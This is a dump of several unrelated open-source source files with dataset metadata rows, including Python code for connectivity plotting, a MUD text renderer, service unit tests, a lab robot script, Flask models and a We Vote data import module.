store a `git describe` of the definitions.git repo as a convenience for
post-upgrade hooks that we may need to implement at a future date:
the `git describe` output lists the last tag, which will hopefully help
us to identify which release of a system was deployed without having to
keep a list of SHA1s somewhere or query a Trove.
'''
def remove_passwords(env):
is_password = morphlib.util.env_variable_is_password
return { k:v for k, v in env.iteritems() if not is_password(k) }
meta = {
'system-artifact-name': system_artifact.name,
'configuration': remove_passwords(env),
'deployment-type': deployment_type,
'location': location,
'definitions-version': {
'describe': root_repo_dir.describe(),
},
'morph-version': {
'ref': morphlib.gitversion.ref,
'tree': morphlib.gitversion.tree,
'commit': morphlib.gitversion.commit,
'version': morphlib.gitversion.version,
},
}
return meta
| gpl-2.0 | -7,916,551,351,011,835,000 | 42.882698 | 79 | 0.57351 | false |
pravsripad/jumeg | examples/connectivity/plot_grouped_connectivity_circle.py | 2 | 1374 | #!/usr/bin/env python
'''
Example showing how to read grouped aparc labels from yaml file and plot
grouped connectivity circle with these labels.
Author: Praveen Sripad <[email protected]>
'''
import numpy as np
from jumeg import get_jumeg_path
from jumeg.connectivity import plot_grouped_connectivity_circle
import yaml
labels_fname = get_jumeg_path() + '/data/desikan_label_names.yaml'
yaml_fname = get_jumeg_path() + '/data/desikan_aparc_cortex_based_grouping.yaml'
replacer_dict_fname = get_jumeg_path() + '/data/replacer_dictionaries.yaml'
with open(labels_fname, 'r') as f:
label_names = yaml.safe_load(f)['label_names']
with open(replacer_dict_fname, 'r') as f:
replacer_dict = yaml.safe_load(f)['replacer_dict_aparc']
# make a random matrix with 68 nodes
# use simple seed for reproducibility
np.random.seed(42)
con = np.random.random((68, 68))
con[con < 0.5] = 0.
indices = (np.array((1, 2, 3)), np.array((5, 6, 7)))
plot_grouped_connectivity_circle(yaml_fname, con, label_names,
labels_mode='replace',
replacer_dict=replacer_dict,
out_fname='example_grouped_con_circle.png',
colorbar_pos=(0.1, 0.1),
n_lines=10, colorbar=True,
colormap='viridis')
| bsd-3-clause | -3,088,841,760,635,333,600 | 35.157895 | 80 | 0.624454 | false |
buckets1337/UOMUMM | src/Renderer.py | 1 | 5959 | # Renderer.py
# Various ways to format text output to players
class Renderer():
'''
A renderer component just contains methods for formatting text output in various ways
'''
def __init__(self, server):
self.owner = server
def formatMessage(self, message, width):
'''
splits a <message> string into lines that are <width> characters long without breaking words
apart across lines. Broken apart single lines are slightly indented on every line other than
the first in the final formatted message.
Returns the formatted message string.
'''
count = 0
formatted = ''
if message == None:
message = 'None'
for character in range(0,len(message)):
char = message[character]
if char != '\n':
if count < width:
formatted += char
count += 1
#print formatted
else:
if message[character] == ' ':
formatted += "\n" + char
count = 2
#print 'da TRUTH'
else:
collecting = True
coll = ''
i = 1
while collecting:
if message[character-i] != '\n':
coll += message[character-i]
i += 1
else:
collecting = False
if ' ' not in coll.strip():
#print 'TRUE'
formatted += "\n " + char
count = 2
else:
#print 'checking...'
checking = True
i = 1
while checking:
msg = message.strip()
chk = msg[character-i]
#print chk
if chk == ' ':
#print formatted
formatted = formatted[:-i] + "\n" + formatted[-i:] + char
#print formatted
count = i + 1
checking = False
else:
i += 1
else:
formatted += char
count = 0
return formatted
def messageBox(self, client, title, message):
'''
displays a simple <message> in a box for <client>.
The box resizes to fit the message and title.
Has a <title> at the top of the box along the border.
'''
message = self.formatMessage(message, 76)
#print message
if message.endswith("\n"):
message = message[:-1]
msgLines = message.split('\n')
#print msgLines
finalMsg = ''
longest = 0
for line in msgLines:
if len(line) > longest:
longest = len(line)
for line in msgLines:
if longest > len(str(title)):
if longest > len(line):
mod = longest - len(line)
line = line + ((mod) * " ")
# else:
# line = line + ((len(str(title)) - 4) * " ")
else:
mod = (len(str(title)) + 2) - len(line)
line = line + (mod * " ")
line = " | " + line + " |\n"
finalMsg += line
#print int((0.5)*float(longest))
if longest >= len(str(title)):
titleLine = "\n " + (int((0.5)*float(longest - len(str(title)))+1)* "_") + "^!"+str(title)+"^~" + (int((0.5)*float(longest - len(str(title)))+1)* "_") + "\n"
titleLineLen = len(titleLine) - 6
if titleLineLen > (longest + 2):
#print len(titleLine)
#print longest + 2
diff = titleLineLen - (longest + 2) - 1
if not diff <= 0:
titleLine = titleLine[:-diff] + "\n"
if diff == 0:
titleLine = titleLine[:-1] + "_\n"
elif (longest + 2) >= titleLineLen:
diff = (longest + 2) - titleLineLen
if titleLine.endswith("\n"):
titleLine = titleLine[:-1]
titleLine += (diff * "_") + "\n"
client.send_cc(titleLine)
client.send_cc(" |" + ((longest + 2)*" ") + "|\n")
client.send_cc(finalMsg)
client.send_cc(" |" + ((longest + 2)*"_") + "|\n\n")
else:
client.send_cc("\n __^!" + str(title) + "^~__\n")
client.send_cc(" |" + ((4 + len(str(title))) * " ") + "|\n")
client.send_cc(finalMsg)
client.send_cc(" |" + ((4 + len(str(title))) * "_") + "|\n\n")
def roomDisplay(self, client, room):
'''
renders the typical display for a room to client
'''
namePad = 80 - len(room.name) - 2
client.send_cc("\n")
message = "+" + ("-" * (int(0.5 *namePad)-1)) + "^! " + str(room.name) + " ^~" + ("-" * (int(0.5* namePad)-1)) + "+" + "\n"
if len(message) < 81:
message = "+" + ("-" * (int(0.5 *namePad)-1)) + "^! " + str(room.name) + " ^~" + ("-" * (int(0.5* namePad)-1)) + "-+" + "\n"
client.send_cc(message)
# client.send_cc("|" + (" " * 78) + "|" + "\n")
descrip = self.formatMessage(room.description, 76)
desc = descrip.split("\\n")
#print desc
for line in desc:
linePad = 80 - len(line) - 2
if len(line) > 0:
message = "|" +(" " * (int(0.5 *linePad))) + line +(" " * (int(0.5 *linePad))) + "|" + "\n"
if len(message) < 81:
message = ("|" +(" " * (int(0.5 *linePad))) + line +(" " * (int(0.5 *linePad))) + " |" + "\n")
client.send_cc(message)
else:
client.send_cc("|" + (" " * 78) + "|" + "\n")
client.send_cc("+" + ("-" * 78) + "+" + "\n")
client.send_cc("|" + (" " * 78) + "|" + "\n")
#print "players: " + str(room.players)
for player in room.players:
if player.connection != client:
playerPad = int(80 - len(player.name) - 3)
client.send_cc("| " + "^C" + str(player.name) + "^~" + (" " * playerPad) + "|" + "\n")
else:
client.send_cc("|" + (" " * 78) + "|" + "\n")
client.send_cc("|" + (" " * 78) + "|" + "\n")
client.send_cc("|" + (" " * 78) + "|" + "\n")
exitList = []
if room.orderedExits == []:
#print 'test'
#print room.exits
for exit in room.exits:
#print room.exits[exit]
exitList.append(str(room.exits[exit]))
room.orderedExits = exitList
else:
for rm in room.orderedExits:
exitList.append(str(rm[1]))
#print exitList
if exitList != []:
lenExit = len(exitList[0])
else:
lenExit = 0
firstPad = int(80 - lenExit - 12)
if exitList != []:
msg = "| " + "^!exits:^~ 1." + exitList[0] + (" " * firstPad) + "|" + "\n"
client.send_cc(msg)
i = 2
for exit in exitList[1:]:
pad = int(80 - len(exitList[i-1]) - 12)
client.send_cc("| " + str(i) + "." + exitList[i-1] + (" " * pad) + "|" + "\n")
i += 1
else:
client.send_cc("|" + (" " * 78) + "|" + "\n")
client.send_cc("+" + ("-" * 78) + "+" + "\n") | apache-2.0 | -8,190,471,305,137,985,000 | 28.8 | 161 | 0.52492 | false |
shvets/etvnet-plex-plugin | test/archive_service_test.py | 1 | 7248 | import test_helper
import unittest
import json
from etvnet_service import EtvnetService
from config import Config
class EtvnetServiceTest(unittest.TestCase):
def setUp(self):
config = Config("../etvnet.config")
self.service = EtvnetService(config)
def test_channels(self):
result = self.service.get_channels()
print(json.dumps(result, indent=4))
self.assertEqual(result['status_code'], 200)
self.assertNotEqual(len(result['data']), 0)
for value in result['data']:
print(value['name'])
def test_archive(self):
result = self.service.get_archive(channel=3)
# print(json.dumps(result, indent=4))
self.assertEqual(result['status_code'], 200)
self.assertNotEqual(len(result['data']['media']), 0)
print(json.dumps(result['data']['media'], indent=4))
def test_genres(self):
result = self.service.get_genres()
# print(json.dumps(result, indent=4))
for item in result['data']:
print(item['id'])
print(item['name'])
self.assertEqual(result['status_code'], 200)
self.assertNotEqual(len(result['data']), 0)
def test_blockbusters(self):
result = self.service.get_blockbusters()
#print(json.dumps(result, indent=4))
for item in result['data']['media']:
print(item['type'])
print(item['id'])
print(item['name'])
self.assertEqual(result['status_code'], 200)
self.assertNotEqual(len(result['data']['media']), 0)
# def test_serials(self):
# result = self.service.get_serials()
#
# #print(json.dumps(result, indent=4))
#
# for item in result['data']['media']:
# print(item['type'])
# print(item['id'])
# print(item['name'])
#
# self.assertEqual(result['status_code'], 200)
# self.assertNotEqual(len(result['data']['media']), 0)
# def test_movies(self):
# result = self.service.get_movies()
#
# #print(json.dumps(result, indent=4))
#
# for item in result['data']['media']:
# print(item['type'])
# print(item['id'])
# print(item['name'])
#
# self.assertEqual(result['status_code'], 200)
# self.assertNotEqual(len(result['data']['media']), 0)
def test_search(self):
query= "news"
result = self.service.search(query=query)
print(json.dumps(result, indent=4))
self.assertEqual(result['status_code'], 200)
self.assertNotEqual(len(result['data']), 0)
def test_pagination(self):
query= "news"
result = self.service.search(query=query, page=1, per_page=20)
#print(json.dumps(result, indent=4))
pagination = result['data']['pagination']
self.assertEqual(pagination['has_next'], True)
self.assertEqual(pagination['has_previous'], False)
self.assertEqual(pagination['page'], 1)
result = self.service.search(query=query, page=2)
#print(json.dumps(result, indent=4))
pagination = result['data']['pagination']
self.assertEqual(pagination['has_next'], True)
self.assertEqual(pagination['has_previous'], True)
self.assertEqual(pagination['page'], 2)
def test_new_arrivals(self):
result = self.service.get_new_arrivals()
print(json.dumps(result, indent=4))
self.assertEqual(result['status_code'], 200)
self.assertNotEqual(len(result['data']), 0)
def test_get_url(self):
id = '946671' # 329678
bitrate = '1200'
format = 'mp4'
url_data = self.service.get_url(id, bitrate=bitrate, format=format, protocol='hls')
print('Media Url: ' + url_data['url'])
def test_media_object(self):
result = self.service.get_archive(channel=3)
#print(json.dumps(result, indent=4))
media_object = None
for item in result['data']['media']:
type = item['type']
if type == 'MediaObject':
media_object = item
break
print(json.dumps(media_object, indent=4))
bitrates = self.service.bitrates(media_object['files'])
if 'mp4' in bitrates.keys():
format = 'mp4'
else:
format = 'wmv'
bitrate = bitrates[format][0]
url_data = self.service.get_url(media_object['id'], bitrate=bitrate, format=format, other_server=True)
self.print_url_data(url_data, bitrates)
def test_container(self):
result = self.service.get_archive(channel=3)
#print(json.dumps(result, indent=4))
container = None
for item in result['data']['media']:
type = item['type']
if type == 'Container':
container = item
break
#print(json.dumps(container, indent=4))
children = self.service.get_children(container['id'])
#print(json.dumps(children, indent=4))
first_media_object = None
for child in children['data']['children']:
if child['type'] == 'MediaObject':
first_media_object = child
print(json.dumps(first_media_object, indent=4))
bitrates = self.service.bitrates(first_media_object['files'])
bitrate = bitrates['mp4'][2]
url_data = self.service.get_url(first_media_object['id'], bitrate=bitrate, format='mp4')
self.print_url_data(url_data, bitrates)
def print_url_data(self, url_data, bitrates):
print("Available bitrates:")
if 'wmv' in bitrates.keys():
print("wmv: (" + " ".join(str(x) for x in bitrates['wmv']) + ")")
if 'mp4' in bitrates.keys():
print("mp4: (" + " ".join(str(x) for x in bitrates['mp4']) + ")")
print('Format: ' + url_data['format'])
print('Bitrate: ' + str(url_data['bitrate']))
print('Protocol: ' + str(url_data['protocol']))
print('Media Url: ' + url_data['url'])
def test_get_bookmarks(self):
result = self.service.get_bookmarks()
print(json.dumps(result, indent=4))
self.assertEqual(result['status_code'], 200)
self.assertNotEqual(len(result['data']), 0)
def test_get_folders(self):
result = self.service.get_folders()
print(json.dumps(result, indent=4))
self.assertEqual(result['status_code'], 200)
self.assertNotEqual(len(result['data']), 0)
def test_get_bookmark(self):
bookmarks = self.service.get_bookmarks()
bookmark = bookmarks['data']['bookmarks'][0]
result = self.service.get_bookmark(id=bookmark['id'])
print(json.dumps(result, indent=4))
self.assertEqual(result['status_code'], 200)
self.assertNotEqual(len(result['data']), 0)
def test_get_topics(self):
for topic in EtvnetService.TOPICS:
result = self.service.get_topic_items(topic)
#print(json.dumps(result, indent=4))
self.assertEqual(result['status_code'], 200)
self.assertNotEqual(len(result['data']), 0)
if __name__ == '__main__':
unittest.main() | mit | -6,844,560,154,461,055,000 | 27.652174 | 110 | 0.577401 | false |
tdlong/YeastRobot | UserPrograms/ASE/Rearray_day3_pilot_1.py | 1 | 1439 | import sys
# where RobotControl.py, etc lives
sys.path.append('/home/pi/Desktop/ADL/YeastRobot/PythonLibrary')
from RobotControl import *
#################################
### Define Deck Layout
#################################
deck="""\
DW96W SW96P SW96P SW96P SW96P SW96P SW96P BLANK
BLANK BLANK BLANK BLANK BLANK BLANK BLANK BLANK
BLANK BLANK BLANK BLANK BLANK BLANK BLANK BLANK
BLANK BLANK BLANK BLANK BLANK BLANK BLANK BLANK
"""
# 2 3 4 5 6
# note the 1st user defined column is "2" not zero or one, since tips are at 0 & 1
##################################
myvol = 140
# 1 = UL of BoxA, 2 = UR of BoxA, 3 = LL of BoxA, etc.
OffsetDict={0: 'UL', 1: 'UR', 2: 'LL', 3: 'LR'}
# read in deck, etc
DefineDeck(deck)
printDeck()
InitializeRobot()
CurrentTipPosition = 1
for offset in [0,1,2,3]:
CurrentTipPosition = retrieveTips(CurrentTipPosition)
extraSeatTips()
# initial mix
position(0,2, position = OffsetDict[offset])
mix(300,98,100,5)
# From DW96W to SW96P with 140ul of glycerol
# 6 replicate glycerol stocks
for i in [3,4,5,6,7,8]:
position(0,2, position = OffsetDict[offset])
aspirate(myvol,depth=99,speed=50, mix=3)
position(0,i, position = OffsetDict[offset])
moveDispense(myvol, startdepth = 95, enddepth=60, speed = 50)
disposeTips()
position(0,0)
ShutDownRobot()
quit()
| gpl-3.0 | -2,579,611,862,031,048,700 | 27.215686 | 84 | 0.603892 | false |
cchristelis/watchkeeper | django_project/healthsites/utils.py | 1 | 1525 | __author__ = 'Irwan Fathurrahman <[email protected]>'
__date__ = '25/04/16'
__license__ = "GPL"
__copyright__ = 'kartoza.com'
import os
import json
from django.conf import settings
from django.core.serializers.json import DjangoJSONEncoder
from healthsites.map_clustering import cluster, parse_bbox
from healthsites.models.healthsite import Healthsite
def healthsites_clustering(bbox, zoom, iconsize):
# parse request params
if zoom <= settings.CLUSTER_CACHE_MAX_ZOOM:
# if geoname and tag are not set we can return the cached layer
# try to read healthsitesfrom disk
filename = os.path.join(
settings.CLUSTER_CACHE_DIR,
'{}_{}_{}_healthsites.json'.format(zoom, *iconsize)
)
try:
cached_locs = open(filename, 'rb')
cached_data = cached_locs.read()
return cached_data
except IOError as e:
localities = Healthsite.objects.all()
object_list = cluster(localities, zoom, *iconsize)
# create the missing cache
with open(filename, 'wb') as cache_file:
json_dump = json.dump(object_list, cache_file)
return json_dump
else:
# make polygon
bbox_poly = parse_bbox(bbox)
# cluster healthsites for a view
healthsites = Healthsite.objects.filter(point_geometry__contained=bbox_poly)
object_list = cluster(healthsites, zoom, *iconsize)
return json.dumps(object_list, cls=DjangoJSONEncoder)
| bsd-2-clause | -7,391,638,456,330,655,000 | 34.465116 | 84 | 0.64 | false |
kmerenkov/clitter | setup.py | 1 | 1981 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2008, Konstantin Merenkov <[email protected]>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the <organization> nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY Konstantin Merenkov <[email protected]> ''AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL Konstantin Merenkov <[email protected]> BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from distutils.core import setup
setup(name='clitter',
version='0.1',
description='Command line twitter client',
author='Konstantin Merenkov',
author_email='[email protected]',
url='http://github.com/kmerenkov/clitter/',
packages=['clitter/twitter', 'clitter'],
scripts=['bin/clitter'])
| bsd-3-clause | 7,848,016,887,700,294,000 | 52.540541 | 91 | 0.745583 | false |
Debian/dak | daklib/termcolor.py | 1 | 1725 | # vim:set et sw=4:
"""
TermColor utils for dak
@contact: Debian FTP Master <[email protected]>
@copyright: 2019 Mo Zhou <[email protected]>
@license: GNU General Public License version 2 or later
"""
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
###############################################################################
__all__ = []
###############################################################################
_COLORS_ = ('red', 'green', 'yellow', 'blue', 'violet', 'cyan', 'white')
_COLOR_CODES_ = {k: 31 + _COLORS_.index(k) for k in _COLORS_}
def colorize(s, fg, bg=None, bold=False, ul=False):
'''
s: str -- string to be colorized
fg: str/int -- foreground color. See _COLORS_ for choices
bg: str/int -- background color. See _COLORS_ for choices
bold: bool -- bold font?
ul: bool -- underline?
'''
if fg not in _COLORS_:
raise ValueError("Unsupported foreground Color!")
if (bg is not None) or any((bold, ul)):
raise NotImplementedError
return "\x1b[{}m{}\x1b[0;m".format(_COLOR_CODES_[fg], s)
| gpl-2.0 | -1,461,835,152,391,277,600 | 36.5 | 79 | 0.624928 | false |
alissonpintor/stoky | app/basemodel.py | 1 | 1966 | from flask_sqlalchemy import Model
from sqlalchemy import exc as core_exc
from sqlalchemy.orm import exc
class Result(object):
"""
Classe que recebe o resultado
"""
def __init__(self, status, message):
self.status = status
self.message = message
class BaseModel(Model):
"""
classe Model base que contem metodos comuns
como delete, search by id, update
"""
def update(self):
from app import db
try:
db.session.add(self)
db.session.commit()
return Result(status=True, message='Registro realizado com sucesso')
except Exception as e:
return Result(status=False, message=str(e))
def delete(self):
from app import db
try:
db.session.delete(self)
db.session.commit()
return Result(status=True, message='Registro excluído com sucesso')
except core_exc.IntegrityError:
return Result(status=False, message='Não foi possível excluir. Erro de Integridade')
except Exception as e:
return Result(status=False, message=str(e))
@classmethod
def by_id(cls, id):
from app import db
primary_key = db.inspect(cls).primary_key[0]
data = db.session.query(
cls
).filter(
primary_key==id
).first()
return data
@classmethod
def by(cls, **kwargs):
from app import db
data = db.session.query(cls)
for k, v in kwargs.items():
if k.upper() in cls.__table__.columns.keys():
column = cls.__table__.columns[k.upper()]
data = data.filter(column==v)
data = data.first()
return data
@classmethod
def all(cls):
from app import db
data = cls.query.all()
return data | gpl-3.0 | -4,292,930,550,900,183,600 | 24.842105 | 96 | 0.545593 | false |
brigittebigi/proceed | proceed/src/wxgui/sp_icons.py | 1 | 2562 | import os.path
from sp_glob import ICONS_PATH
# Frames
APP_ICON = os.path.join(ICONS_PATH, "app.ico")
APP_CHECK_ICON = os.path.join(ICONS_PATH, "appcheck.ico")
APP_EXPORT_PDF_ICON = os.path.join(ICONS_PATH, "appexport-pdf.ico")
# For the toolbar of the main frame
EXIT_ICON = os.path.join(ICONS_PATH, "exit.png")
OPEN_ICON = os.path.join(ICONS_PATH, "open.png")
SAVE_ICON = os.path.join(ICONS_PATH, "save.png")
CHECK_ICON = os.path.join(ICONS_PATH, "check.png")
EXPORT_ICON = os.path.join(ICONS_PATH, "export.png")
ADD_ICON = os.path.join(ICONS_PATH, "add.png")
EDIT_ICON = os.path.join(ICONS_PATH, "edit.png")
DELETE_ICON = os.path.join(ICONS_PATH, "delete.png")
ABOUT_ICON = os.path.join(ICONS_PATH, "about.png")
FEEDBACK_ICON = os.path.join(ICONS_PATH, "feedback.png")
CANCEL_ICON = os.path.join(ICONS_PATH, "cancel.png")
APPLY_ICON = os.path.join(ICONS_PATH, "apply.png")
HELP_ICON = os.path.join(ICONS_PATH, "help.png" )
FORWARD_ICON = os.path.join(ICONS_PATH, "forward.png" )
BACKWARD_ICON = os.path.join(ICONS_PATH, "backward.png" )
NEXT_ICON = os.path.join(ICONS_PATH, "next.png")
PREVIOUS_ICON = os.path.join(ICONS_PATH, "previous.png")
HOME_ICON = os.path.join(ICONS_PATH, "home.png" )
LOGOUT_ICON = os.path.join(ICONS_PATH, "logout.png" )
SETTINGS_ICON = os.path.join(ICONS_PATH, "settings.png" )
# For the other frames
AUTHOR_ICON = os.path.join(ICONS_PATH, "author.png")
DOCUMENT_ICON = os.path.join(ICONS_PATH, "document.png")
SESSION_ICON = os.path.join(ICONS_PATH, "session.png")
CONFERENCE_ICON = os.path.join(ICONS_PATH, "conference.png")
IMPORT_EXPORT_ICON = os.path.join(ICONS_PATH, "import-export.png")
GRID_ICON = os.path.join(ICONS_PATH, "grid.png")
TEX_ICON = os.path.join(ICONS_PATH, "tex.png")
WWW_ICON = os.path.join(ICONS_PATH, "www.png")
PROCESS_ICON = os.path.join(ICONS_PATH, "process.png")
# For the Feedback form
MAIL_DEFAULT_ICON = os.path.join(ICONS_PATH, "maildefault.png")
MAIL_GMAIL_ICON = os.path.join(ICONS_PATH, "mailgoogle.png")
MAIL_OTHER_ICON = os.path.join(ICONS_PATH, "mailother.png")
CHECKED_ICON = os.path.join(ICONS_PATH, "check.ico")
UNCHECKED_ICON = os.path.join(ICONS_PATH, "uncheck.ico")
RADIOCHECKED_ICON = os.path.join(ICONS_PATH, "radiocheck.ico")
RADIOUNCHECKED_ICON = os.path.join(ICONS_PATH, "radiouncheck.ico")
| gpl-3.0 | 8,382,389,665,049,526,000 | 46.444444 | 67 | 0.639344 | false |
wevoteeducation/WeVoteBase | import_export/models.py | 1 | 38189 | # import_export/models.py
# Brought to you by We Vote. Be good.
# -*- coding: UTF-8 -*-
from django.contrib import messages
from election_office_measure.models import Election, ContestOffice, CandidateCampaign, CandidateCampaignManager, \
BallotItem
from exception.models import handle_exception, handle_record_not_found_exception, \
handle_record_not_saved_exception
from import_export_google_civic.models import GoogleCivicBallotItem, GoogleCivicBallotItemManager, \
GoogleCivicElection, GoogleCivicContestOffice
from import_export_theunitedstatesio.models import TheUnitedStatesIoLegislatorCurrent
import json
from organization.models import Organization, OrganizationManager
from politician.models import Politician
from position.models import PositionEntered
import requests
from wevotebase.base import get_environment_variable
import wevote_functions.admin
from wevote_functions.models import value_exists
logger = wevote_functions.admin.get_logger(__name__)
def transfer_theunitedstatesio_cached_data_to_wevote_tables():
"""
In this method, we take the cached theunitedstatesio data and move it into the core We Vote data
:return:
"""
logger.info("Running transfer_theunitedstatesio_cached_data_to_wevote_tables()")
legislators_current_query = TheUnitedStatesIoLegislatorCurrent.objects.all()
# Only retrieve entries that haven't been processed yet
# legislators_current_query = legislators_current_query.filter(was_processed=False)
for legislator_current_entry in legislators_current_query:
logger.info(u"Transferring {id}: {first_name} {last_name}".format(
id=str(legislator_current_entry.id),
first_name=legislator_current_entry.first_name,
last_name=legislator_current_entry.last_name
))
politician_entry_found = False
#########################
# Search the Politician's table to see if we already have an entry for this person
# Do we have a record of this politician based on id_bioguide?
if legislator_current_entry.bioguide_id != "":
try:
# Try to find earlier version based on the bioguide identifier
query1 = Politician.objects.all()
query1 = query1.filter(id_bioguide__exact=legislator_current_entry.bioguide_id)
# Was at least one existing entry found based on the above criteria?
if len(query1):
politician_entry = query1[0]
politician_entry_found = True
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
if not politician_entry_found:
# TheUnitedStatesIoLegislatorCurrent was not found based on bioguide id
# ...so check to see if we have a record of this legislator based on govtrack id?
if legislator_current_entry.govtrack_id != "":
try:
query1 = Politician.objects.all()
query1 = query1.filter(id_govtrack__exact=legislator_current_entry.govtrack_id)
# Was at least one existing entry found based on the above criteria?
if len(query1):
politician_entry = query1[0]
logger.debug("FOUND")
politician_entry_found = True
else:
logger.debug("NOT FOUND")
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
if not politician_entry_found:
# TheUnitedStatesIoLegislatorCurrent was not found based on id_govtrack
# ...so check to see if we have a record of this legislator based on full_name_google_civic
if legislator_current_entry.first_name and legislator_current_entry.last_name:
try:
full_name_assembled_guess = \
legislator_current_entry.first_name+" "+legislator_current_entry.last_name
logger.info(u"Searching for existing full_name_google_civic: {full_name_assembled}".format(
full_name_assembled=full_name_assembled_guess
))
query1 = Politician.objects.all()
query1 = query1.filter(full_name_google_civic=full_name_assembled_guess)
# Was at least one existing entry found based on the above criteria?
if len(query1):
politician_entry = query1[0]
logger.debug("FOUND")
politician_entry_found = True
else:
logger.debug("NOT FOUND")
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
if not politician_entry_found:
# TheUnitedStatesIoLegislatorCurrent was not found based on full_name_google_civic
# ...so check to see if we have a record of this legislator based on full_name_assembled
if legislator_current_entry.first_name and legislator_current_entry.last_name:
try:
full_name_assembled_guess = \
legislator_current_entry.first_name+" "+legislator_current_entry.last_name
logger.info("Searching for existing full_name_assembled: {full_name_assembled}".format(
full_name_assembled=full_name_assembled_guess
))
query1 = Politician.objects.all()
query1 = query1.filter(full_name_assembled=full_name_assembled_guess)
# Was at least one existing entry found based on the above criteria?
if len(query1):
politician_entry = query1[0]
logger.debug("FOUND")
politician_entry_found = True
else:
logger.debug("NOT FOUND")
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
if not politician_entry_found:
# TheUnitedStatesIoLegislatorCurrent was not found
# ...so create a new entry
politician_entry = Politician(
last_name=legislator_current_entry.last_name,
first_name=legislator_current_entry.first_name,
full_name_assembled=legislator_current_entry.first_name+" "+legislator_current_entry.last_name,
)
politician_entry.last_name = legislator_current_entry.last_name
politician_entry.first_name = legislator_current_entry.first_name
politician_entry.full_name_assembled = \
legislator_current_entry.first_name+" "+legislator_current_entry.last_name
politician_entry.birth_date = legislator_current_entry.birthday
politician_entry.gender = legislator_current_entry.gender
politician_entry.id_bioguide = legislator_current_entry.bioguide_id
politician_entry.id_thomas = legislator_current_entry.thomas_id
politician_entry.id_opensecrets = legislator_current_entry.opensecrets_id
politician_entry.id_lis = legislator_current_entry.lis_id
politician_entry.id_cspan = legislator_current_entry.cspan_id
politician_entry.id_govtrack = legislator_current_entry.govtrack_id
politician_entry.id_votesmart = legislator_current_entry.votesmart_id
politician_entry.id_ballotpedia = legislator_current_entry.ballotpedia_id
politician_entry.id_washington_post = legislator_current_entry.washington_post_id
politician_entry.id_icpsr = legislator_current_entry.icpsr_id
politician_entry.id_wikipedia = legislator_current_entry.wikipedia_id
# OTHER FIELDS
# "type", # row[4]
politician_entry.state_code = legislator_current_entry.state # "state", # row[5]
# "district", # row[6]
politician_entry.party = legislator_current_entry.party # "party", # row[7]
# "url", # row[8]
# "address", # row[9]
# "phone", # row[10]
# "contact_form", # row[11]
# "rss_url", # row[12]
# "twitter", # row[13]
# "facebook", # row[14]
# "facebook_id", # row[15]
# "youtube", # row[16]
# "youtube_id", # row[17]
# We use "try/exception" so we know when entry isn't saved due to unique requirement
# This works! Bigger question -- how to deal with exceptions in general?
try:
politician_entry.save()
# Mark the source entry as was_processed so we don't try to import the same data again
# legislator_current_entry.save()
except Exception as e:
handle_exception(e, logger=logger)
def google_civic_save_election():
# Bring in the GoogleCivicElection and save the Election
google_civic_query1 = GoogleCivicElection.objects.all()
# Only retrieve entries that haven't been processed yet
# google_civic_query1 = google_civic_query1.filter(was_processed=False)
for google_civic_election_entry in google_civic_query1:
election_exists_locally = False
#########################
# Search the Election table to see if we already have an entry for this election
if google_civic_election_entry.google_civic_election_id != "":
try:
# Try to find earlier version based on the google_civic_election_id identifier
query1 = Election.objects.all()
query1 = query1.filter(
google_civic_election_id__exact=google_civic_election_entry.google_civic_election_id)
# Was at least one existing entry found based on the above criteria?
if len(query1):
election_entry = query1[0]
election_exists_locally = True
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
continue
try:
if election_exists_locally:
# Update the values
election_entry.google_civic_election_id = google_civic_election_entry.google_civic_election_id
election_entry.name = google_civic_election_entry.name+"TEST"
election_entry.election_date_text = google_civic_election_entry.election_day
else:
# An entry in the local Election was not found based on google_civic_election_id
# ...so create a new entry
election_entry = Election(
google_civic_election_id=google_civic_election_entry.google_civic_election_id,
name=google_civic_election_entry.name,
election_date_text=google_civic_election_entry.election_day,
)
election_entry.save()
# Mark the source entry as was_processed so we don't try to import the same data again
# google_civic_election_entry.was_processed = True
# Save the local we vote id back to the imported google civic data for cross-checking
google_civic_election_entry.we_vote_election_id = election_entry.id
google_civic_election_entry.save()
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
continue
# END OF google_civic_save_election
def google_civic_get_or_create_contest_office(google_civic_candidate_campaign_entry, election_on_stage):
error_result = False
ballot_item_on_stage = BallotItem()
ballot_item_on_stage_found = False
google_civic_ballot_item_on_stage = GoogleCivicBallotItem()
contest_office_on_stage = ContestOffice()
contest_office_created = False
google_civic_contest_office_on_stage = GoogleCivicContestOffice()
try:
